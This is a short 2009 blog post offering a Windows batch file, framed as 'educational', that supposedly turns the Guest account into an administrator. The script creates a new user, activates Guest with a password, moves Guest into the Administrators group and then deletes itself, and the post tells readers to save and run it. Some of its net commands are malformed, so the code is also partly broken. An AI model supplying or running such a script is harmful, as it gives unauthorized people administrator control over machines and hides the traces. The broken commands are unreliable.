Sunday, June 21, 2009

Much Simpler Trick To Hack Admin From Guest By Devan

Note:Educational Purpose only

Hack Guest With Admin Privileges

CODE:

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0


Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...

Share Your Tips Here..

No comments:

Post a Comment